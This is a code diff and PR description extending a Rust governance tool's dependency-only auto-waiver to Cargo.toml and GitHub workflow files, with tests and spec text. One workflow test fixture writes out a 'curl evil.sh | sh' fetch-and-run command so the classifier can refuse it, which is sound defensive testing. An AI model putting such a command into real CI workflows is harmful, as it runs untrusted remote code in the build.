+    }
+
+    #[test]
+    fn cargo_spec_metadata_edit_is_not() {
+        let head = CARGO.replace("014-api", "999-other");
+        assert!(!cargo_dependency_only_change(CARGO, &head));
+    }
+
+    #[test]
+    fn cargo_shape_flip_is_not() {
+        // A bare string becoming a table (adding features) is not a pure bump.
+        let head = CARGO.replace(
+            r#"serde = "1.0.0""#,
+            r#"serde = { version = "1.0.0", features = ["derive"] }"#,
+        );
+        assert!(!cargo_dependency_only_change(CARGO, &head));
+    }
+
+    #[test]
+    fn cargo_added_feature_table_is_not() {
+        let head = CARGO.replace(
+            "[dependencies]",
+            "[build-dependencies]\ncc = \"1\"\n\n[dependencies]",
+        );
+        assert!(!cargo_dependency_only_change(CARGO, &head));
+    }
+
+    #[test]
+    fn cargo_reformat_only_is_dependency_only() {
+        let head = CARGO.replace(r#"serde = "1.0.0""#, "serde   =   \"1.0.0\"");
+        assert!(cargo_dependency_only_change(CARGO, &head));
+    }
+
+    #[test]
+    fn cargo_unparseable_is_not() {
+        assert!(!cargo_dependency_only_change(CARGO, "not = = toml"));
+        assert!(!cargo_dependency_only_change("[[a]]\nx=1", "[[a]]\nx=2")); // array-of-tables top level is still a table doc; value change refused
+    }
+
+    // ===== workflow =====
+
+    const WF: &str = r#"
+name: CI
+on: [push]
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - uses: actions/setup-node@v4
+        with:
+          node-version: 20
+      - run: cargo test
+"#;
+
+    #[test]
+    fn workflow_uses_ref_bump_is_dependency_only() {
+        let head = WF
+            .replace("actions/checkout@v4", "actions/checkout@v5")
+            .replace("actions/setup-node@v4", "actions/setup-node@v6");
+        assert!(workflow_dependency_only_change(WF, &head));
+    }
+
+    #[test]
+    fn workflow_sha_pin_bump_is_dependency_only() {
+        let base = "jobs:\n  b:\n    steps:\n      - uses: actions/checkout@abc123 # v4.1.0\n";
+        let head = "jobs:\n  b:\n    steps:\n      - uses: actions/checkout@def456 # v5.0.0\n";
+        assert!(workflow_dependency_only_change(base, head));
+    }
+
+    #[test]
+    fn workflow_with_edit_is_not() {
+        let head = WF.replace("node-version: 20", "node-version: 22");
+        assert!(!workflow_dependency_only_change(WF, &head));
+    }
+
+    #[test]
+    fn workflow_run_edit_is_not() {
+        let head = WF.replace("cargo test", "curl evil.sh | sh");
+        assert!(!workflow_dependency_only_change(WF, &head));
+    }
+
+    #[test]
+    fn workflow_added_step_is_not() {
+        let head = WF.replace(
+            "      - run: cargo test",
+            "      - run: cargo test\n      - run: cargo build",
+        );
+        assert!(!workflow_dependency_only_change(WF, &head));
+    }
+
+    #[test]
+    fn workflow_changed_action_path_is_not() {
+        let head = WF.replace("actions/checkout@v4", "evil/checkout@v4");
+        assert!(!workflow_dependency_only_change(WF, &head));
+    }
+
+    #[test]
+    fn workflow_unpin_is_not() {
+        let head = WF.replace("actions/checkout@v4", "actions/checkout");
+        assert!(!workflow_dependency_only_change(WF, &head));
+    }
+
+    #[test]
+    fn workflow_unparseable_is_not() {
+        assert!(!workflow_dependency_only_change(WF, "key: [unbalanced"));
+    }
+
+    // ===== dispatch =====
+
     #[test]
     fn waiver_requires_all_files_to_qualify() {
         let bump = fc(
@@ -226,10 +622,45 @@ mod tests {
     }
 
     #[test]
-    fn package_json_path_shapes() {
+    fn waiver_mixes_manifest_classes() {
+        let npm = fc(
+            "package.json",
+            r#"{"dependencies":{"a":"1"}}"#,
+            r#"{"dependencies":{"a":"2"}}"#,
+        );
+        let cargo = fc(
+            "crate-a/Cargo.toml",
+            "[dependencies]\nserde = \"1.0.0\"\n",
+            "[dependencies]\nserde = \"1.0.1\"\n",
+        );
+        let wf = fc(
+            ".github/workflows/ci.yml",
+            "jobs:\n  b:\n    steps:\n      - uses: actions/checkout@v4\n",
+            "jobs:\n  b:\n    steps:\n      - uses: actions/checkout@v5\n",
+        );
+        assert!(dependency_only_waiver(&[npm, cargo, wf]).is_some());
+    }
+
+    #[test]
+    fn manifest_path_shapes() {
         assert!(is_package_json("package.json"));
         assert!(is_package_json("apps/api/package.json"));
         assert!(!is_package_json("apps/api/package.json5"));
         assert!(!is_package_json("not-package.json/file.ts"));
+
+        assert!(is_cargo_toml("Cargo.toml"));
+        assert!(is_cargo_toml("crates/core/Cargo.toml"));
+        assert!(!is_cargo_toml("Cargo.lock"));
+
+        assert!(is_workflow_yaml(".github/workflows/ci.yml"));
+        assert!(is_workflow_yaml(".github/workflows/nested/x.yaml"));
+        assert!(is_workflow_yaml("sub/.github/workflows/ci.yml"));
+        assert!(!is_workflow_yaml(".github/dependabot.yml"));
+        assert!(!is_workflow_yaml("docs/workflows/ci.yml"));
+
+        assert!(is_dependency_manifest("Cargo.toml"));
+        assert!(is_dependency_manifest("x/package.json"));
+        assert!(is_dependency_manifest(".github/workflows/ci.yml"));
+        assert!(!is_dependency_manifest("src/lib.rs"));
     }
 }

--- a/crates/spec-spine-core/src/index.rs
+++ b/crates/spec-spine-core/src/index.rs
@@ -1013,9 +1013,11 @@ fn package_manifest_rel(package: &PackageRecord) -> String {
 }
 
 /// The hash a per-package index shard self-describes: its manifest folded with
-/// the global-inputs scalar. npm manifests fold as their governance projection
-/// (spec 004 §3.5): a dependabot-class dependency bump leaves the shard fresh,
-/// while a name / workspaces / spec-metadata change stales it.
+/// the global-inputs scalar. npm and cargo manifests fold as their governance
+/// projection (spec 004 §3.5; cargo added by spec 030): a dependabot-class
+/// dependency bump leaves the shard fresh, while a change to a field the
+/// indexer reads (name / version / workspaces / spec-metadata / package kind)
+/// stales it.
 fn package_shard_hash(
     repo_root: &Path,
     package: &PackageRecord,
@@ -1028,6 +1030,8 @@ fn package_shard_hash(
         let piece = if manifest_rel.ends_with("package.json") {
             crate::manifest::npm_hash_projection(&content, &cfg.manifest.metadata_namespace)
                 .unwrap_or(content)
+        } else if manifest_rel.ends_with("Cargo.toml") {
+            crate::manifest::cargo_hash_projection(&content).unwrap_or(content)
         } else {
             content
         };

--- a/crates/spec-spine-core/src/lib.rs
+++ b/crates/spec-spine-core/src/lib.rs
@@ -51,8 +51,9 @@ pub use couple::{
     is_bypassed_path, parse_waiver,
 };
 pub use dep_only::{
-    DEPENDENCY_TABLES, FileContents, dependency_only_change, dependency_only_waiver,
-    is_package_json,
+    CARGO_DEPENDENCY_TABLES, DEPENDENCY_TABLES, FileContents, cargo_dependency_only_change,
+    dependency_only_change, dependency_only_waiver, is_cargo_toml, is_dependency_manifest,
+    is_package_json, is_workflow_yaml, workflow_dependency_only_change,
 };
 pub use index::{
     Freshness, IndexOutcome, IndexShardSet, authorities, check_index_freshness,

--- a/crates/spec-spine-core/src/manifest.rs
+++ b/crates/spec-spine-core/src/manifest.rs
@@ -309,6 +309,69 @@ pub fn npm_hash_projection(content: &str, namespace: &str) -> Option<String> {
     serde_json::to_string(&serde_json::Value::Object(proj)).ok()
 }
 
+/// Cargo dependency tables stripped from the governance projection: a
+/// dependabot-class version bump lives entirely inside these (at the top level,
+/// under `[workspace]`, or under `[target.<cfg>]`). Mirrors
+/// `dep_only::CARGO_DEPENDENCY_TABLES`.
+const CARGO_DEP_TABLES: &[&str] = &["dependencies", "dev-dependencies", "build-dependencies"];
+
+/// The governance projection of a Cargo manifest (spec 030, extending the
+/// 2026-06-11 npm projection to the cargo ecosystem). The manifest with its
+/// dependency tables removed, rendered as canonical JSON so the hash is
+/// deterministic (the same sorted-key path the npm projection folds through).
+/// A dependabot-class version bump changes only a stripped table, so it leaves
+/// the projection (and the shard hash) unchanged, while any other edit (name,
+/// version, edition, `[package.metadata.<ns>]`, a `[lib]` / `[bin]` presence
+/// flip that would move the package kind, a feature-flag change, a new table)
+/// still stales it. `None` (unparseable / not a table) tells the caller to fall
+/// back to raw bytes: over-hashing is the fail-closed direction.
+pub fn cargo_hash_projection(content: &str) -> Option<String> {
+    let mut doc: toml::Value = toml::from_str(content).ok()?;
+    let table = doc.as_table_mut()?;
+    strip_cargo_dep_tables(table);
+    serde_json::to_string(&toml_to_json(&doc)).ok()
+}
+
+/// Remove the cargo dependency tables at every location cargo allows them.
+fn strip_cargo_dep_tables(table: &mut toml::Table) {
+    for key in CARGO_DEP_TABLES {
+        table.remove(*key);
+    }
+    if let Some(toml::Value::Table(ws)) = table.get_mut("workspace") {
+        ws.remove("dependencies");
+    }
+    if let Some(toml::Value::Table(targets)) = table.get_mut("target") {
+        for (_, cfg) in targets.iter_mut() {
+            if let toml::Value::Table(cfg) = cfg {
+                for key in CARGO_DEP_TABLES {
+                    cfg.remove(*key);
+                }
+            }
+        }
+    }
+}
+
+/// Deterministic TOML → JSON, so the cargo projection hashes through the same
+/// canonical (sorted-key) serializer the npm projection uses. `Datetime` folds
+/// to its string form; a non-finite float folds to null (cargo manifests carry
+/// none of either in practice).
+fn toml_to_json(value: &toml::Value) -> serde_json::Value {
+    use serde_json::Value as J;
+    match value {
+        toml::Value::String(s) => J::String(s.clone()),
+        toml::Value::Integer(i) => J::Number((*i).into()),
+        toml::Value::Float(f) => serde_json::Number::from_f64(*f).map_or(J::Null, J::Number),
+        toml::Value::Boolean(b) => J::Bool(*b),
+        toml::Value::Datetime(d) => J::String(d.to_string()),
+        toml::Value::Array(a) => J::Array(a.iter().map(toml_to_json).collect()),
+        toml::Value::Table(t) => J::Object(
+            t.iter()
+                .map(|(k, v)| (k.clone(), toml_to_json(v)))
+                .collect(),
+        ),
+    }
+}
+
 // ===== shared =====
 
 /// Rebase a workspace-member glob declared in `decl` (a repo-relative declaration

--- a/docs/adoption-guide.md
+++ b/docs/adoption-guide.md
@@ -205,7 +205,7 @@ divergence observed across the reference repos. Every sub-table is
 | `branding.compiler_id` / `indexer_id` | ids stamped in emitted `build` metadata | `"spec-spine"` |
 | `coupling.bypass_prefixes` | **additions** to the built-in bypass floor (additive; cannot remove a floor entry) | `[]` |
 | `coupling.waiver_keyword` | the PR-body waiver keyword | `"Spec-Drift-Waiver:"` |
-| `coupling.auto_waive_dependency_only` | when `true` and no PR-body waiver is present, mechanically self-waives PRs where every non-bypassed changed path is a `package.json` with only dependency version-string changes (the dependabot-class path); fail-closed on anything more (spec 005 §3.5) | `false` |
+| `coupling.auto_waive_dependency_only` | when `true` and no PR-body waiver is present, mechanically self-waives PRs where every non-bypassed changed path is a recognized dependency manifest with only version-pin changes: a `package.json` dependency table, a `Cargo.toml` dependency version, or a claimed `.github/workflows/*.yml` `uses:` action ref (the dependabot-class path); fail-closed on anything more (spec 005 §3.5, extended by spec 030) | `false` |
 | `provenance.uri_schemes` | open kind→scheme map for provenance URIs | `{ knowledge = "knowledge://", code-fingerprint = "fingerprint://" }` |
 | `frontmatter.extra_known_keys` | recognized frontmatter keys added without forking the types crate | `[]` |
 

--- a/docs/api.md
+++ b/docs/api.md
@@ -95,12 +95,19 @@ pub struct Waiver    { pub reason: String }
 // Build a Waiver from a PR body using the configured keyword:
 pub fn parse_waiver(cfg: &Config, pr_body: &str) -> Option<Waiver>;
 
-// Mechanical dependency-only auto-waiver (spec 005 §3.5), used when
-// `coupling.auto_waive_dependency_only` is set and no PR-body waiver is present:
+// Mechanical dependency-only auto-waiver (spec 005 §3.5; cargo + workflow
+// classes added by spec 030), used when `coupling.auto_waive_dependency_only`
+// is set and no PR-body waiver is present. dependency_only_waiver dispatches
+// per manifest class; is_dependency_manifest is the CLI pre-filter predicate:
 pub struct FileContents { pub path: String, pub base: String, pub head: String }
 pub fn dependency_only_waiver(files: &[FileContents]) -> Option<Waiver>;
-pub fn dependency_only_change(base: &str, head: &str) -> bool;  // both are package.json text
+pub fn is_dependency_manifest(path: &str) -> bool;      // package.json | Cargo.toml | workflow yaml
+pub fn dependency_only_change(base: &str, head: &str) -> bool;           // package.json text
+pub fn cargo_dependency_only_change(base: &str, head: &str) -> bool;     // Cargo.toml text
+pub fn workflow_dependency_only_change(base: &str, head: &str) -> bool;  // workflow yaml text
 pub fn is_package_json(path: &str) -> bool;
+pub fn is_cargo_toml(path: &str) -> bool;
+pub fn is_workflow_yaml(path: &str) -> bool;
 
 // Is a path covered by the bypass floor (+ configured `coupling.bypass_prefixes`)?
 pub fn is_bypassed_path(cfg: &Config, index: &CodebaseIndex, path: &str) -> bool;

--- a/specs/004-codebase-index/spec.md
+++ b/specs/004-codebase-index/spec.md
@@ -124,10 +124,17 @@ Rationale: dependency tables are not a governed input (the indexer never
 reads them), so a dependabot-class version bump must not stale the committed
 index (the bot can neither re-index nor edit a PR body), while a change to
 any field the indexer *does* read still does. An unparseable manifest falls
-back to raw bytes: over-hashing is the fail-closed direction. Cargo and pnpm
-manifests still fold as raw bytes. Upgrading across this amendment changes
-every npm-bearing repo's computed hash once: re-run `spec-spine index` when
-bumping the dependency.
+back to raw bytes: over-hashing is the fail-closed direction. Upgrading across
+this amendment changes every npm-bearing repo's computed hash once: re-run
+`spec-spine index` when bumping the dependency.
+
+**Cargo.toml folds as its own governance projection too** (spec 030, extending
+this amendment to the cargo ecosystem): the parsed manifest with its dependency
+tables (`dependencies` / `dev-dependencies` / `build-dependencies`, at the top
+level and under `[workspace]` / `[target.<cfg>]`) stripped, so a cargo version
+bump is not a hashed input while everything the indexer reads (name, version,
+edition, the `[package.metadata.<ns>]` binding, `[lib]` / `[bin]` presence)
+still stales the shard. pnpm manifests still fold as raw bytes.
 
 ### 3.6 Traceability and diagnostics
 

--- a/specs/005-coupling-gate/spec.md
+++ b/specs/005-coupling-gate/spec.md
@@ -164,6 +164,12 @@ either the predecessor or the successor clears the path.
   Git-diff mode only (`--paths-from` carries no content). The freshness
   half of the dependabot story is spec 004 §3.5's governance-projection
   hashing, which keeps a dep-only bump from staling the committed index.
+  **Spec 030 extends this mechanism** to two more ecosystems under the same
+  opt-in flag: a `Cargo.toml` whose only change is dependency version
+  specifiers, and a claimed `.github/workflows/*.yml` whose only change is the
+  `@ref` of `uses:` action references. The whole-diff rule is unchanged (every
+  non-bypassed path must be a recognized manifest whose change is
+  dependency-only); the paired cargo freshness projection also lands in 004 §3.5.
 
 ### 3.6 Granularity reconciliation (the crate-spec vs file-establishes question)
 

--- a/specs/030-cargo-workflow-dependency-waiver/spec.md
+++ b/specs/030-cargo-workflow-dependency-waiver/spec.md
@@ -1,0 +1,180 @@
+---
+id: "030-cargo-workflow-dependency-waiver"
+title: "Cargo and workflow dependabot bumps self-clear: freshness projection + auto-waiver"
+status: approved
+kind: "tooling"
+created: "2026-07-03"
+implementation: complete
+owner: "The spec-spine Authors"
+depends_on:
+  - "004-codebase-index"
+  - "005-coupling-gate"
+amends:
+  - "004-codebase-index"
+  - "005-coupling-gate"
+extends:
+  # Freshness half (004 §3.5): Cargo.toml joins package.json in folding as a
+  # governance projection, so a cargo version bump does not stale the index.
+  - { spec: "004-codebase-index", unit: "crates/spec-spine-core/src/manifest.rs", nature: additive }
+  - { spec: "004-codebase-index", unit: "crates/spec-spine-core/src/index.rs", nature: additive }
+  # Coupling half (005 §3.5): the mechanical auto-waiver gains cargo and
+  # workflow classifiers; the CLI pre-filter admits all three manifest classes.
+  - { spec: "005-coupling-gate", unit: "crates/spec-spine-core/src/dep_only.rs", nature: additive }
+  - { spec: "005-coupling-gate", unit: "crates/spec-spine-cli/src/cmd_couple.rs", nature: additive }
+  - { spec: "005-coupling-gate", unit: "crates/spec-spine-cli/tests/couple.rs", nature: additive }
+summary: >
+  Amends 004 §3.5 and 005 §3.5, extending the paired 2026-06-11 npm
+  dependency-only mechanism to the cargo and GitHub Actions ecosystems so a
+  dependabot-class bump self-clears without a human waiver. Freshness half:
+  Cargo.toml folds into the index content hash as a governance projection (its
+  dependency tables stripped), mirroring npm, so a version bump leaves the
+  committed shards fresh. Coupling half: the mechanical auto-waiver recognizes a
+  Cargo.toml whose only change is dependency version specifiers, and a
+  `.github/workflows/*.yml` whose only change is the `@ref` of `uses:` action
+  references. Every non-version edit (a new or removed dependency, a feature /
+  git / path change, a `run:` / `with:` edit, an added step or table, an
+  unpinned action, a spec-metadata edit) still refuses the waiver, fail-closed.
+  A claimed workflow file (007/008/021's release.yml) and a crate whose direct
+  dependencies dependabot bumps are the live acceptance tests.
+---
+
+# 030: Cargo and workflow dependabot bumps self-clear
+
+## 1. Purpose
+
+The 2026-06-11 amendment paired two mechanisms so a dependabot-class
+`package.json` bump self-clears: spec 004 §3.5 folds npm manifests as a
+governance projection (a version bump is not a hashed input, so the index stays
+fresh), and spec 005 §3.5 mechanically waives a coupling drift whose only change
+is a dependency version string. A bot can neither re-index nor add a
+`Spec-Drift-Waiver:` line, so without both halves a routine bump walls on a
+stale index (exit 2) or an unwaivable `C-001` (exit 1).
+
+That mechanism stopped at npm. Two other ecosystems dependabot manages hit the
+same wall on this repo's own corpus:
+
+- **cargo.** A crate's `Cargo.toml` is a discovered manifest folded as **raw
+  bytes** (004 §3.5), so a `[dependencies]` version bump stales the index. It is
+  also floor-owned or explicitly claimed, so it fires `C-001`. Both halves are
+  missing.
+- **GitHub Actions.** `.github/workflows/release.yml` is explicitly claimed by
+  specs 007/008/021 (`kind: file`), so spec 009 lifts it above the `.github/`
+  floor and a `uses:` action bump fires `C-001`. A `file` unit carries no span
+  and is not a hashed input (004 §3.5), so freshness is already fine; only the
+  coupling half is missing.
+
+The evidence is this repo's merge history: the cargo group bump (#52) and the
+GitHub Actions major bumps (#55) each required a hand-written
+`Spec-Drift-Waiver:` line, because the bot could not add one itself. This spec
+closes both gaps by extending the existing mechanism, not inventing a new one.
+
+## 2. Territory
+
+`spec-spine-core`'s `manifest.rs` (a new `cargo_hash_projection`, paired with
+`npm_hash_projection`) and `index.rs` (the per-shard manifest fold routes
+`Cargo.toml` through it); plus `dep_only.rs` (two new fail-closed classifiers
+and the generalized waiver dispatch) and the `cmd_couple.rs` pre-filter (it now
+admits all three manifest classes), with the CLI end-to-end test. No new config
+knob (the existing opt-in `config.coupling.auto_waive_dependency_only` now
+covers all three classes); no schema change; no new DTO field; no user-facing
+CLI surface change.
+
+## 3. Behavior
+
+### 3.1 Cargo freshness projection (amends 004 §3.5)
+
+A `Cargo.toml` folds into the index content hash as its **governance
+projection**: the parsed manifest with its dependency tables removed, rendered
+through the same canonical (sorted-key) serializer the npm projection uses so
+the hash is deterministic across the release matrix. The stripped tables are
+`dependencies`, `dev-dependencies`, and `build-dependencies` at every location
+cargo allows them: the top level, under `[workspace]`, and under each
+`[target.<cfg>]`. Everything the indexer actually reads is preserved and still
+stales the shard on change: `[package]` `name` / `version` / `edition`, the
+`[package.metadata.<ns>]` spec binding, and the presence of `[lib]` / `[bin]`
+(which determines the package kind). An unparseable or non-table manifest falls
+back to raw bytes: over-hashing is the fail-closed direction, exactly as npm.
+
+Like the npm amendment, upgrading across this change re-computes every
+cargo-bearing repo's hash once (its crate shards now fold the projection, not
+the raw bytes); re-run `spec-spine index` when adopting. `Cargo.lock` is
+untouched: it remains on the bypass floor.
+
+### 3.2 Cargo dependency-only auto-waiver (amends 005 §3.5)
+
+When opted in and no explicit PR-body waiver is present, a `Cargo.toml` among
+the non-bypassed changed paths is dependency-only iff its parsed base and head
+are equal everywhere except the **version specifiers of existing
+dependencies**. Inside a dependency table the package key sets must match; each
+entry is either a bare version string on both sides (which may differ) or a
+table on both sides with an identical field set where only `version` may differ
+(both string). A dependency added or removed, a shape flip (string to table or
+back), a change to any non-version field (`features`, `git`, `path`,
+`optional`, `default-features`, a rename), or any change outside a dependency
+table refuses the waiver.
+
+### 3.3 Workflow dependency-only auto-waiver (amends 005 §3.5)
+
+A `.github/workflows/*.yml` among the non-bypassed changed paths is
+dependency-only iff its parsed base and head are equal everywhere except the
+`@ref` of `uses:` action references: a `uses:` scalar may differ only when both
+sides are `owner/action@ref` strings with an identical, non-empty
+`owner/action` and both pinned. YAML comments (where a SHA-pinned action records
+its human-readable version) are dropped by the parser on both sides, so a
+SHA-pin bump with a moving `# vX.Y.Z` comment is dependency-only. A new or
+removed step or job, a `with:` / `run:` / `env:` edit, an added key, a changed
+action path, or an unpinned action (`@ref` removed) refuses the waiver.
+
+A workflow file reaches this checker only when it is **not bypassed**, which
+under spec 009 means it is explicitly claimed by a spec (`.github/` is otherwise
+floor-bypassed). So this half governs exactly the claimed-workflow surface, for
+example release.yml: it mechanically proves the same property a human waiver on
+#55 asserted by hand ("changes only pinned `uses:` action versions, no job
+logic").
+
+### 3.4 The whole-diff rule is unchanged
+
+The mechanical waiver still fires only when **every** non-bypassed changed path
+is a recognized dependency manifest whose change is dependency-only, evaluated
+at the merge base and head (three-dot diff, git-diff mode only; `--paths-from`
+carries no content). A diff mixing classes (a `package.json` bump, a `Cargo.toml`
+bump, and a `uses:` bump together) waives iff each qualifies. A single
+non-manifest path, a created or deleted manifest, or one non-version edit
+anywhere sinks the whole waiver: the drift is reported unwaived and the gate
+exits 1. The claim-aware bypass verdict (spec 009) still decides which paths are
+candidates, so a claimed floor path cannot slip past the pre-filter.
+
+### 3.5 Config, determinism, and report shape
+
+No new config: the existing opt-in `config.coupling.auto_waive_dependency_only`
+(default `false`) now covers all three classes. Broadening an opt-in,
+fail-closed flag is additive; a repo that wants npm bumps waived wants its cargo
+and claimed-workflow bumps waived on the same terms. The core functions stay
+pure (no clock, env, or git); `cargo_hash_projection` and the two classifiers
+are deterministic pure functions of their input bytes. The `CoupleReport` and
+the index DTOs gain no fields; the auto-waived report is indistinguishable from
+the npm case.
+
+### 3.6 Tests (minimum)
+
+- Cargo bare-string and table `version` bump across `[dependencies]`,
+  `[dev-dependencies]`, and `[workspace.dependencies]`: dependency-only.
+- Cargo added/removed dependency, feature-list edit, shape flip, package
+  `version` edit, spec-metadata edit, added table: each refuses.
+- Cargo reformat-only: dependency-only (alters no governed fact).
+- Workflow `uses:` tag bump and SHA-pin bump: dependency-only. A `with:` /
+  `run:` edit, an added step, a changed action path, an unpin: each refuses.
+- End to end: a floor-owned crate's dependency bump stays index-fresh and
+  auto-waives; a claimed workflow file's `uses:` bump stays index-fresh (file
+  unit, no span) and auto-waives; a cargo feature edit drifts.
+
+## 4. Out of scope
+
+Other manifest ecosystems dependabot manages (`pyproject.toml`,
+`requirements.txt`, `go.mod`, Gradle, Docker `FROM` pins): the same pattern
+extends to each behind its own fail-closed classifier, filed when a real bump
+needs it. Lockfiles stay on the bypass floor (they are never a governed input).
+The auto-waiver remains opt-in and per-repo; this spec does not change its
+default. Semantic drift that preserves version pins (a dependency bump that also
+silently changes behavior) is out of scope for the same reason it is for npm:
+the gate detects line-and-pin coupling, not behavioral equivalence.


### PR DESCRIPTION
## What

Extends the paired 2026-06-11 npm dependency-only self-clear to the **cargo**
and **GitHub Actions** ecosystems, so routine Dependabot bumps stop needing a
hand-written `Spec-Drift-Waiver:` line. The manual waivers on #52 (cargo group)
and #55 (10 action majors) are the evidence: the bot edits governed manifests
but cannot waive, so every bump walled.

Filed as spec **030-cargo-workflow-dependency-waiver**, which `amends` 004 and
005.

## Why it is a 004 + 005 pairing (not just 005)

The request was "extend the coupling auto-waiver (005)". Doing cargo correctly
needs both halves, exactly like npm:

- **Cargo needs both.** `Cargo.toml` is a discovered manifest folded into the
  index content hash as raw bytes, so a dep bump *stales the index* (exit 2) and
  the gate refuses to run before the waiver can fire. So 030 adds the 004 §3.5
  freshness projection *and* the 005 §3.5 auto-waiver.
- **Workflow needs only the waiver.** `.github/` is on the bypass floor, but
  `release.yml` is explicitly claimed by 007/008/021, and a claimed path
  overrides the floor (spec 009), so a `uses:` bump drifts. File units carry no
  span and are not hashed, so freshness was already fine.

## The mechanism

- **Freshness (004 §3.5):** `cargo_hash_projection` strips the dependency tables
  (`dependencies` / `dev-dependencies` / `build-dependencies`, at the top level,
  under `[workspace]`, and under `[target.<cfg>]`) and folds the rest through the
  same deterministic sorted-key path npm uses. Everything the indexer reads
  (name, version, edition, `[package.metadata.<ns>]`, `[lib]` / `[bin]` presence)
  still stales the shard.
- **Coupling (005 §3.5):** two strict fail-closed classifiers. A `Cargo.toml`
  self-clears iff its only change is dependency version specifiers; a claimed
  `.github/workflows/*.yml` self-clears iff its only change is the `@ref` of
  `uses:` references (same `owner/action`, both pinned). A new/removed
  dependency, a feature/git/path edit, a `run:` / `with:` edit, an added step, a
  shape flip, or an unpinned action still drifts.
- **No new config, no schema change:** the existing opt-in
  `config.coupling.auto_waive_dependency_only` now covers all three classes.

## Self-governance

Spec 030 co-owns the modified units via additive `extends` edges (the spec-009
pattern), so this PR clears its own coupling gate **with no waiver**. The cargo
projection recomputes this repo's own three crate `by-package` shard hashes once
(the documented one-time change); regenerated and committed.

## Tests

20 new unit tests (cargo + workflow classifiers, mixed-class dispatch) and 3 new
end-to-end tests (a floor-owned crate dep bump stays index-fresh and auto-waives;
a claimed workflow `uses:` bump stays index-fresh and auto-waives; a cargo
feature edit drifts). Full suite: 229 passed. `fmt`, `clippy -D warnings`,
`compile`, `index check`, `lint`, and `couple` all green.

## Out of scope (030 §4)

`pyproject.toml` / `go.mod` / Docker `FROM` pins follow the same pattern behind
their own fail-closed classifier, filed when a real bump needs one. Lockfiles
stay on the bypass floor. The tree-sitter exact-pin bump still needs deliberate
handling; its determinism comes from span-backing hashing plus `Cargo.lock`, not
the manifest hash, so this projection does not weaken it.
